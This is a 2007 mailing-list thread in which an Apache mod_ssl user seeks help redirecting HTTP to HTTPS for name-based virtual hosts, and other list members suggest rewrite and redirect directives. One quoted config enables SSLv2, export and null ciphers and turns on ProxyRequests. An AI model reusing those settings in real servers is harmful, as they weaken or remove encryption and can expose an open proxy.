19:52:37 -0400 From: Bernard Barton User-Agent: Thunderbird 2.0.0.5 (X11/20070727) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: How to redirect http to https on same server? References: <470D8BCE.7020000@comcast.net> <470E2C7C.5020409@nrlssc.navy.mil> In-Reply-To: <470E2C7C.5020409@nrlssc.navy.mil> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Bernard Barton X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Thanks for all the responses. But no matter what I do or where I place a Rewrite or Redirect, I get the following error in Firefox: ((("The page isn't redirecting properly Firefox has detected that the server is redirecting the request for this address in a way that will never complete. This problem can sometimes be caused by disabling or refusing to accept cookies."))) The page is redirected from http://myserver to https://myserver, but I get the above message. I do have Firefox configured to accept cookies. When I try to access the site using IE, it just hangs. Any suggestions would be greatly appreciated. Roy Keene (Contractor) wrote: > Bernard Barton wrote: >> I'm trying to redirect users from http://vhost.mydomain.com to >> https://vhost.mydomain.com using this RewriteRule: >> >> RewriteCond %{SERVER_PORT} !^443$ >> RewriteRule ^/(.*)$ https://cj-mydomain.choicepoint.net/$1 [L,R] >> >> >> This does not seem to work. I have the following defined as a virtual >> host, and the ssl.include is listed below that. What do I need to do to >> redirect http to https on the same server? >> >> -Thanks >> >> >> >> >> >> #See file below >> Include conf/conf.d/ssl.include >> >> ErrorLog /usr/local/apache/logs/ssl_mydomain_error_log >> CustomLog /usr/local/apache/logs/ssl_mydomain_access_log >> combined >> >> >> ProxyRequests On >> >> ProxyPass / http://vhost.mydomain.net:80/ >> ProxyPassReverse / http://vhost.mydomain.net:80/ >> >> >> >> >> >> >> ########################### ssl.include >> >> SSLEngine on >> >> SSLCipherSuite >> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL >> >> SSLCertificateFile >> /usr/local/apache-1.3.37/conf/ssl.crt/star_mydomain_net.crt >> >> SSLCertificateKeyFile >> /usr/local/apache-1.3.37/conf/ssl.key/star_mydomain_net.key >> >> SSLCertificateChainFile >> /usr/local/apache-1.3.37/conf/ssl.crt/DigiCertCA.crt >> >> >> SSLOptions +StdEnvVars >> >> >> SetEnvIf User-Agent ".*MSIE.*" \ >> nokeepalive ssl-unclean-shutdown \ >> downgrade-1.0 force-response-1.0 >> >> ______________________________________________________________________ >> Apache Interface to OpenSSL (mod_ssl) www.modssl.org >> User Support Mailing List modssl-users@modssl.org >> Automated List Manager majordomo@modssl.org >> > > > This is what I use (from internal documentation): > 1. Redirect all HTTP requests to HTTPS > a. Load mod_rewrite (see: > http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html ) > b. Add the following rule to your non-HTTPS server configuration > (httpd.conf): > # Require HTTPS > RewriteEngine on > RewriteRule ^/(.*) https://${SERVER_NAME}/$1 > [redirect=permanent] > > > Yours should work, too, though since it is only substantially > different in two (2) ways: > 1. You don't have "RewriteEngine on" in the snippet, I assume you > have it somewhere though > 2. You check SERVER_PORT against !^443$ (it would probably be > better to check the environment variable HTTPS, though) -- that should > work. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Oct 12 01:59:36 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 0578614D888; Fri, 12 Oct 2007 01:59:36 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from mpls-qmqp-05.inet.qwest.net (mpls-qmqp-05.inet.qwest.net [63.231.195.116]) by master.modssl.org (Postfix) with ESMTP id 2324414D840 for ; Fri, 12 Oct 2007 01:59:34 +0200 (CEST) Received: from mpls-pop-15.inet.qwest.net (mpls-pop-15.inet.qwest.net [63.231.195.15]) by mpls-qmqp-05.inet.qwest.net (Postfix) with QMQP id 09A2462D48B for ; Thu, 11 Oct 2007 23:59:32 +0000 (UTC) Received: from unknown (HELO mail.finch.st) (63.231.83.246) by mpls-pop-15.inet.qwest.net with SMTP; 11 Oct 2007 23:59:31 -0000 Received: from localhost ([127.0.0.1]) by mail.finch.st with esmtp (Exim 4.66 (FreeBSD)) (envelope-from ) id 1Ig7uP-0002Ch-L5 for modssl-users@modssl.org; Thu, 11 Oct 2007 17:57:41 -0600 Date: Thu, 11 Oct 2007 17:57:41 -0600 (MDT) From: Aaron Dalton X-X-Sender: aaron@moondance.itsy-bitsy.net To: modssl-users@modssl.org Subject: Re: How to redirect http to https on same server? In-Reply-To: <470EB745.6010403@comcast.net> Message-ID: <20071011175432.N5033@moondance.itsy-bitsy.net> References: <470D8BCE.7020000@comcast.net> <470E2C7C.5020409@nrlssc.navy.mil> <470EB745.6010403@comcast.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Aaron Dalton X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users On Thu, 11 Oct 2007, Bernard Barton wrote: > Thanks for all the responses. But no matter what I do or where I place > a Rewrite or Redirect, I get the following error in Firefox: > > ((("The page isn't redirecting properly > > Firefox has detected that the server is redirecting the request for this > address in a way that will never complete. > Where are you attempting to put the RedirectPermanent directive? I assume you have a plain virtual host entry for http://myhost. In that container you put the RedirectPermanent / https://myhost (which is of course in it's own container with all the ssl stuff). Can you copy your http://myhost config? -- Aaron Dalton Super Duper Games http://superdupergames.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Oct 14 00:59:12 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 5CB9414DA2E; Sun, 14 Oct 2007 00:59:12 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from rwcrmhc11.comcast.net (rwcrmhc11.comcast.net [216.148.227.151]) by master.modssl.org (Postfix) with ESMTP id 8996A14D844 for ; Sun, 14 Oct 2007 00:59:08 +0200 (CEST) Received: from antares.bfbsystems.com (c-71-230-79-89.hsd1.pa.comcast.net[71.230.79.89]) by comcast.net (rwcrmhc11) with ESMTP id <20071013225904m1100mv0npe>; Sat, 13 Oct 2007 22:59:05 +0000 Message-ID: <47114DB7.5@comcast.net> Date: Sat, 13 Oct 2007 18:59:03 -0400 From: Bernard Barton User-Agent: Thunderbird 2.0.0.5 (X11/20070727) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Are text attachments permitted in mailing list? Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Bernard Barton X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users I sent a message with an attachment several hours ago, and still have not received a copy of it via the modssl-users mailing list. The message included two text attachments. Are text attachments allowed? -Thanks ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Oct 14 16:33:52 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 92EB314DA31; Sun, 14 Oct 2007 16:33:51 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from alnrmhc14.comcast.net (alnrmhc14.comcast.net [204.127.225.94]) by master.modssl.org (Postfix) with ESMTP id 4F44F14D844 for ; Sun, 14 Oct 2007 16:33:49 +0200 (CEST) Received: from antares.bfbsystems.com (c-71-230-79-89.hsd1.pa.comcast.net[71.230.79.89]) by comcast.net (alnrmhc14) with ESMTP id <20071014143346b1400p5km6e>; Sun, 14 Oct 2007 14:33:46 +0000 Message-ID: <471228C8.40505@comcast.net> Date: Sun, 14 Oct 2007 10:33:44 -0400 From: Bernard Barton User-Agent: Thunderbird 2.0.0.5 (X11/20070727) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Why are some messages not being distributed to mailing list? Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Bernard Barton X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users I sent an email with two text attachments, and never received a copy from the mailing list from owner-modssl-users@modssl.org. So I sent a message asking if attachments were permitted, and did receive that message. So, I sent another message WITHOUT attachments, but placed copies of the httpd.conf and another .conf file withing the message. I have not received that message either, from the mailing list. Any ideas? -Thanks ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Oct 16 00:32:52 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id E574D14DA2C; Tue, 16 Oct 2007 00:32:52 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from rwcrmhc14.comcast.net (rwcrmhc14.comcast.net [216.148.227.154]) by master.modssl.org (Postfix) with ESMTP id AB12E14D84C for ; Tue, 16 Oct 2007 00:32:51 +0200 (CEST) Received: from antares.bfbsystems.com (c-71-230-79-89.hsd1.pa.comcast.net[71.230.79.89]) by comcast.net (rwcrmhc14) with ESMTP id <20071015223246m1400ovf28e>; Mon, 15 Oct 2007 22:32:47 +0000 Message-ID: <4713EA7B.9000106@comcast.net> Date: Mon, 15 Oct 2007 18:32:27 -0400 From: Bernard Barton User-Agent: Thunderbird 2.0.0.5 (X11/20070727) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Please help with http -> https redirection Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Bernard Barton X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users In my main httpd.conf file, I have numerous include files which include virtual hosts like so: Include /usr/local/apache/conf/conf.d/devl00.conf Include /usr/local/apache/conf/conf.d/devl01.conf Include /usr/local/apache/conf/conf.d/devl02.conf So if I access http://devl02.mydomain.com/ then I see the virtual host defined in devl02.conf, etc. In the devl02.conf file, I have enabled SSL. I CAN access the secure site https://devl02.mydomain.com/. However, when I now access the non-secure site of http://devl02.mydomain.com, the main server web site is displayed, and not the virtual host. What I'm trying to do is a RedirectPermanent / https://cj-devl02.mydomain.net/ But when I do this I get errors that I posted previously about cookies not being enabled. So I guess the questions is, having the "Include" statements above, and knowing that each include file like devl08.conf is a virtual host container with SSL enabled, how do I redirect from the port 80 version to the SSL enabled port 443 version like: http://cj-devl02.mydomain.net/ ------> https://cj-devl02.mydomain.net/ FYI, I've tried including .conf files, and also pasting the contents of my .conf files into an email, but they evidently are rejected by the mailing list. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Oct 16 01:56:11 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 771F514DA29; Tue, 16 Oct 2007 01:56:11 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.191]) by master.modssl.org (Postfix) with ESMTP id D3B5F14D84C for ; Tue, 16 Oct 2007 01:56:08 +0200 (CEST) Received: by nf-out-0910.google.com with SMTP id g16so1413320nfd for ; Mon, 15 Oct 2007 16:56:06 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references:x-google-sender-auth; bh=kihyW8lSdv0yqF9fL0Y+umDKV/NVAQHpnanmjfZcjmc=; b=cKzUOTZgpNNF1wZ+3yo+07fJE/eVQDY+Ko8dSNOTTZ/CkNmu6xo9rnDjUMwrkiGMSZkvOJc6tZa4K+Ok7Sjl8jsbgUoO6MzuDJySvVqxTYRUYcUj3Q7Qbszlp5v1SbpGvI/6S5Q7Xl+zVgzdaHo/joFUB6ZekgqmIX3kURl0YgQ= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references:x-google-sender-auth; b=ukD1eljGKRTaoCWoV4SMX4MpNlAbhnf8vdsrr8vLrW8HMNtLwX7ue9RBaS2peNK+6M6s5ASXYmcyrKPs9c5KkDHEXn+FluGL7xnjuStRI8AOUAYASMgGaqd1ovKrA6pji9juORDi8x+x5MZNw9RRswzf91HdTEeT2Ptf58rPn70= Received: by 10.82.181.10 with SMTP id d10mr12364610buf.1192492564517; Mon, 15 Oct 2007 16:56:04 -0700 (PDT) Received: by 10.82.161.2 with HTTP; Mon, 15 Oct 2007 16:56:04 -0700 (PDT) Message-ID: Date: Mon, 15 Oct 2007 19:56:04 -0400 From: "Cliff Woolley" To: modssl-users@modssl.org Subject: Re: Please help with http -> https redirection In-Reply-To: <4713EA7B.9000106@comcast.net> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_42857_10074525.1192492564515" References: <4713EA7B.9000106@comcast.net> X-Google-Sender-Auth: ae4503337e1db2bf Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Cliff Woolley" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users ------=_Part_42857_10074525.1192492564515 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Are these IP-based virtual hosts or name-based virtual hosts? See http://httpd.apache.org/docs/2.0/vhosts/name-based.html --Cliff On 10/15/07, Bernard Barton wrote: > > In my main httpd.conf file, I have numerous include files which include > virtual hosts like so: > > Include /usr/local/apache/conf/conf.d/devl00.conf > Include /usr/local/apache/conf/conf.d/devl01.conf > Include /usr/local/apache/conf/conf.d/devl02.conf > > > So if I access http://devl02.mydomain.com/ then I see the virtual host > defined > in devl02.conf, etc. In the devl02.conf file, I have enabled SSL. I CAN > access the secure site https://devl02.mydomain.com/. However, when I now > access the non-secure site of http://devl02.mydomain.com, the main server > web site is displayed, and not the virtual host. What I'm trying to do > is a > > RedirectPermanent / https://cj-devl02.mydomain.net/ > > But when I do this I get errors that I posted previously about cookies not > being enabled. So I guess the questions is, having the "Include" > statements > above, and knowing that each include file like devl08.conf is a virtual > host > container with SSL enabled, how do I redirect from the port 80 version to > the SSL enabled port 443 version like: > > http://cj-devl02.mydomain.net/ ------> https://cj-devl02.mydomain.net/ > > FYI, I've tried including .conf files, and also pasting the contents of my > .conf files into an email, but they evidently are rejected by the > mailing list. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ------=_Part_42857_10074525.1192492564515 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline
Are these IP-based virtual hosts or name-based virtual hosts?  See http://httpd.apache.org/docs/2.0/vhosts/name-based.html

--Cliff


On 10/15/07, Bernard Barton <bfb21@comcast.net> wrote:
In my main httpd.conf file, I have numerous include files which include
virtual hosts like so:

Include /usr/local/apache/conf/conf.d/devl00.conf
Include /usr/local/apache/conf/conf.d/devl01.conf
Include /usr/local/apache/conf/conf.d/devl02.conf


So if I access http://devl02.mydomain.com/ then I see the virtual host
defined
in devl02.conf, etc.  In the devl02.conf file, I have enabled SSL.  I CAN
access the secure site https://devl02.mydomain.com/.  However, when I now
access the non-secure site of http://devl02.mydomain.com, the main server
web site is displayed, and not the virtual host.  What I'm trying to do
is a

   RedirectPermanent / https://cj-devl02.mydomain.net/

But when I do this I get errors that I posted previously about cookies not
being enabled.  So I guess the questions is, having the "Include" statements
above, and knowing that each include file like devl08.conf is a virtual host
container with SSL enabled, how do I redirect from the port 80 version to
the SSL enabled port 443 version like:

http://cj-devl02.mydomain.net/  ------>  https://cj-devl02.mydomain.net/

FYI, I've tried including .conf files, and also pasting the contents of my
.conf files into an email, but they evidently are rejected by the
mailing list.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                       modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------=_Part_42857_10074525.1192492564515-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Oct 16 04:13:29 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 7A95514DA2C; Tue, 16 Oct 2007 04:13:29 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from sccrmhc14.comcast.net (sccrmhc14.comcast.net [63.240.77.84]) by master.modssl.org (Postfix) with ESMTP id DA6FC14D84C for ; Tue, 16 Oct 2007 04:13:26 +0200 (CEST) Received: from antares.bfbsystems.com (c-71-230-79-89.hsd1.pa.comcast.net[71.230.79.89]) by comcast.net (sccrmhc14) with ESMTP id <2007101602132301400mebg4e>; Tue, 16 Oct 2007 02:13:23 +0000 Message-ID: <47141E28.6080509@comcast.net> Date: Mon, 15 Oct 2007 22:12:56 -0400 From: Bernard Barton User-Agent: Thunderbird 2.0.0.5 (X11/20070727) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Please help with http -> https redirection References: <4713EA7B.9000106@comcast.net> In-Reply-To: Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Bernard Barton X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users These are name based virtual hosts. Numerous hosts, only one IP address. So each of the included .conf files below such as devl00.conf and devl01.conf begin with something like this: ServerName devl02.mydomain.net ServerAdmin webmaster@mydomain.net LogLevel debug So I can access https://devl02.mydomain.com/ directly, but if I try and redirect from http://devl02.mydomain.com to the https URL of the same name, I get the default insecure web site, which is defined in the httpd.conf file. -Thanks Cliff Woolley wrote: > > Are these IP-based virtual hosts or name-based virtual hosts? See > http://httpd.apache.org/docs/2.0/vhosts/name-based.html > > --Cliff > > > On 10/15/07, *Bernard Barton* > wrote: > > In my main httpd.conf file, I have numerous include files which > include > virtual hosts like so: > > Include /usr/local/apache/conf/conf.d/devl00.conf > Include /usr/local/apache/conf/conf.d/devl01.conf > Include /usr/local/apache/conf/conf.d/devl02.conf > > > So if I access http://devl02.mydomain.com/ then I see the virtual host > defined > in devl02.conf, etc. In the devl02.conf file, I have enabled > SSL. I CAN > access the secure site https://devl02.mydomain.com/. However, > when I now > access the non-secure site of http://devl02.mydomain.com, the main > server > web site is displayed, and not the virtual host. What I'm trying > to do > is a > > RedirectPermanent / https://cj-devl02.mydomain.net/ > > But when I do this I get errors that I posted previously about > cookies not > being enabled. So I guess the questions is, having the "Include" > statements > above, and knowing that each include file like devl08.conf is a > virtual host > container with SSL enabled, how do I redirect from the port 80 > version to > the SSL enabled port 443 version like: > > http://cj-devl02.mydomain.net/ ------> https://cj-devl02.mydomain.net/ > > FYI, I've tried including .conf files, and also pasting the > contents of my > .conf files into an email, but they evidently are rejected by the > mailing list. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) > www.modssl.org > User Support Mailing List > modssl-users@modssl.org > Automated List > Manager majordomo@modssl.org > > > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Oct 16 04:26:52 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 8B8D814DA2E; Tue, 16 Oct 2007 04:26:52 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from py-out-1112.google.com (py-out-1112.google.com [64.233.166.176]) by master.modssl.org (Postfix) with ESMTP id 66CA414D84C for ; Tue, 16 Oct 2007 04:26:49 +0200 (CEST) Received: by py-out-1112.google.com with SMTP id a25so3475936pyi for ; Mon, 15 Oct 2007 19:26:46 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; bh=TGOQy56DMwomuCXOjA52Z+XPbS6xKg/05LFjN0m8oro=; b=TTzG//NYRwuam/4xVjPsW7EWCMlrT3vECauawI00sSmLEATNbQAMyjGYA+YQEBN2lzdn9e1kDn+MURPxpKVBGm7vKySgQKg+bm83DsJh4m/sbv6IguGWIR5X+EHchxYdb/xjjQdqKSKKuidF2EBLqfTXB1pUtn9kxwI5JJbOyMs= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=ZIDVQZ1FyVXX07bi1QOepxK8Tauh8I1oyDupYncu/QUmyIaUYieKNzmg8PtrJDH4M8mABbQKql/asy1/eDh6Bdby3+kY/A135O00dvGLTvftz6OkKm4mCYjCB2BKwZB9NEzIt1fnZ69YVfLjtvkIsO0kDDDJ157CKN4z22SL+7Y= Received: by 10.35.110.13 with SMTP id n13mr8489234pym.1192501606559; Mon, 15 Oct 2007 19:26:46 -0700 (PDT) Received: by 10.35.113.2 with HTTP; Mon, 15 Oct 2007 19:26:46 -0700 (PDT) Message-ID: Date: Mon, 15 Oct 2007 21:26:46 -0500 From: "Brian Hayward" To: modssl-users@modssl.org Subject: Re: Please help with http -> https redirection In-Reply-To: <4713EA7B.9000106@comcast.net> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <4713EA7B.9000106@comcast.net> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Brian Hayward" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users If all you want to do is redirect "/" on your non-SSL Port to "/" on your SSL port, you could use a zero second redirect. e.g. put this in your index.html for the port 80 virtual host: And have your real content in a different document root for your port 443 virtual host. The only drawback is that it's not feasible to redirect deep links (or bookmarks) to the non-secure web server using this approach. -- Brian On 10/15/07, Bernard Barton wrote: > In my main httpd.conf file, I have numerous include files which include > virtual hosts like so: > > Include /usr/local/apache/conf/conf.d/devl00.conf > Include /usr/local/apache/conf/conf.d/devl01.conf > Include /usr/local/apache/conf/conf.d/devl02.conf > > > So if I access http://devl02.mydomain.com/ then I see the virtual host > defined > in devl02.conf, etc. In the devl02.conf file, I have enabled SSL. I CAN > access the secure site https://devl02.mydomain.com/. However, when I now > access the non-secure site of http://devl02.mydomain.com, the main server > web site is displayed, and not the virtual host. What I'm trying to do > is a > > RedirectPermanent / https://cj-devl02.mydomain.net/ > > But when I do this I get errors that I posted previously about cookies not > being enabled. So I guess the questions is, having the "Include" statements > above, and knowing that each include file like devl08.conf is a virtual host > container with SSL enabled, how do I redirect from the port 80 version to > the SSL enabled port 443 version like: > > http://cj-devl02.mydomain.net/ ------> https://cj-devl02.mydomain.net/ > > FYI, I've tried including .conf files, and also pasting the contents of my > .conf files into an email, but they evidently are rejected by the > mailing list. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Oct 16 04:51:38 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 1BD7314DA2E; Tue, 16 Oct 2007 04:51:38 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from rwcrmhc12.comcast.net (rwcrmhc12.comcast.net [204.127.192.82]) by master.modssl.org (Postfix) with ESMTP id 42D7B14D84C for ; Tue, 16 Oct 2007 04:51:35 +0200 (CEST) Received: from antares.bfbsystems.com (c-71-230-79-89.hsd1.pa.comcast.net[71.230.79.89]) by comcast.net (rwcrmhc12) with ESMTP id <20071016025131m1200cmgp4e>; Tue, 16 Oct 2007 02:51:31 +0000 Message-ID: <4714271F.1070009@comcast.net> Date: Mon, 15 Oct 2007 22:51:11 -0400 From: Bernard Barton User-Agent: Thunderbird 2.0.0.5 (X11/20070727) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Please help with http -> https redirection References: <4713EA7B.9000106@comcast.net> In-Reply-To: Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Bernard Barton X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Thanks, but I'm trying to get through this without any code changes. It's ALMOST working! But no cigar. Brian Hayward wrote: > If all you want to do is redirect "/" on your non-SSL Port to "/" on > your SSL port, you could use a zero second redirect. > > e.g. put this in your index.html for the port 80 virtual host: > > > > And have your real content in a different document root for your port > 443 virtual host. > > The only drawback is that it's not feasible to redirect deep links (or > bookmarks) to the non-secure web server using this approach. > > -- > Brian > > On 10/15/07, Bernard Barton wrote: > >> In my main httpd.conf file, I have numerous include files which include >> virtual hosts like so: >> >> Include /usr/local/apache/conf/conf.d/devl00.conf >> Include /usr/local/apache/conf/conf.d/devl01.conf >> Include /usr/local/apache/conf/conf.d/devl02.conf >> >> >> So if I access http://devl02.mydomain.com/ then I see the virtual host >> defined >> in devl02.conf, etc. In the devl02.conf file, I have enabled SSL. I CAN >> access the secure site https://devl02.mydomain.com/. However, when I now >> access the non-secure site of http://devl02.mydomain.com, the main server >> web site is displayed, and not the virtual host. What I'm trying to do >> is a >> >> RedirectPermanent / https://cj-devl02.mydomain.net/ >> >> But when I do this I get errors that I posted previously about cookies not >> being enabled. So I guess the questions is, having the "Include" statements >> above, and knowing that each include file like devl08.conf is a virtual host >> container with SSL enabled, how do I redirect from the port 80 version to >> the SSL enabled port 443 version like: >> >> http://cj-devl02.mydomain.net/ ------> https://cj-devl02.mydomain.net/ >> >> FYI, I've tried including .conf files, and also pasting the contents of my >> .conf files into an email, but they evidently are rejected by the >> mailing list. >> >> ______________________________________________________________________ >> Apache Interface to OpenSSL (mod_ssl) www.modssl.org >> User Support Mailing List modssl-users@modssl.org >> Automated List Manager majordomo@modssl.org >> >> > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Oct 16 14:53:14 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 04C3814D9E6; Tue, 16 Oct 2007 14:53:14 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from rwcrmhc11.comcast.net (rwcrmhc11.comcast.net [204.127.192.81]) by master.modssl.org (Postfix) with ESMTP id 780EB14D84C for ; Tue, 16 Oct 2007 14:53:12 +0200 (CEST) Received: from rmailcenter03.comcast.net ([204.127.197.113]) by comcast.net (rwcrmhc11) with SMTP id <20071016125309m1100muh67e>; Tue, 16 Oct 2007 12:53:09 +0000 Received: from [66.241.32.158] by rmailcenter03.comcast.net; Tue, 16 Oct 2007 12:53:08 +0000 From: bfb21@comcast.net To: modssl-users@modssl.org Cc: Andrew Hougie Subject: Re: Please help with http -> https redirection Date: Tue, 16 Oct 2007 12:53:08 +0000 Message-Id: <101620071253.21465.4714B434000CDF21000053D92200745672CECD0D000D@comcast.net> X-Mailer: AT&T Message Center Version 1 (Oct 4 2006) X-Authenticated-Sender: YmZiMjFAY29tY2FzdC5uZXQ= Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: bfb21@comcast.net X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users So from what I'm gathering, if I have several virtual hosts defined in my httpd.conf file (Using Include) then in order to secure them via SSL, each one would have to have it's own IP address? So for example, each of these virtual host containers in each .conf file included begins with: Include /usr/local/apache/conf/conf.d/devl00.conf Include /usr/local/apache/conf/conf.d/devl01.conf Include /usr/local/apache/conf/conf.d/devl02.conf Include /usr/local/apache/conf/conf.d/devl03.conf Now what I did to get the devl02 virtual host working with SSL was told it to listen on port 443, and read in all the SSL config stuff in a file I named ssl.conf like this: Include conf/conf.d/ssl.include After doing that I can browse to https://devl02.mydomain.com/. -Thanks -------------- Original message ---------------------- From: Andrew Hougie > Do your name-based secure virtual hosts work on their own - does > https://devl02.mydomain.com/ actually work - I thought name-based secure > virtual hosts were impossible/difficult. > > I did find at > http://www.g-loaded.eu/2007/08/10/ssl-enabled-name-based-apache-virtual-hosts-wi > th-mod_gnutls/ > an indication of a new technique for making name-based secure virtual > hosts with SNI - is that what you're using? > > Best wishes > Andrew > > On 16/10/2007 03:12, Bernard Barton 